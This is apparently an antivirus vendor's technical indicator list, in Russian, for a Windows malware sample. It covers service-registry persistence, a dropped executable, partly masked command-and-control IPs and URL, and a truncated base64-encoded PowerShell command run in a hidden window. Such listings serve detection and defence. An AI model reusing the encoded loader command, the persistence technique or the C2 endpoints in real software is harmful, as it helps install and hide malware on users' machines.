Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\setthenetwork] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\setthenetwork] 'ImagePath' = '"%WINDIR%\SysWOW64\setthenetwork.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAWABkAGMAZwByAGkAbgBuAGcAegB0ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFEAYgB0AGQAbABiAHIAcAAgACMAPgAgACQASABlAHYAaQBpAHMAZABpAHIAZABwAG4APQAnAEUAbwBu...
- %HOMEPATH%\807.exe
- %HOMEPATH%\807.exe в %WINDIR%\syswow64\setthenetwork.exe
- '14.##0.93.230':80
- '14#.#39.158.155':80
- '46.##.183.211':8080
- http://46.##.183.211:8080/enabled/cab/ringin/merge/
- DNS ASK wp.##sergy.com
- '%HOMEPATH%\807.exe'
- '%WINDIR%\syswow64\setthenetwork.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAWABkAGMAZwByAGkAbgBuAGcAegB0ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFEAYgB0AGQAbABiAHIAcAAgACMAPgAgACQASABlAHYAaQBpAHMAZABpAHIAZABwAG4APQAnAEUAbwBu...' (со скрытым окном)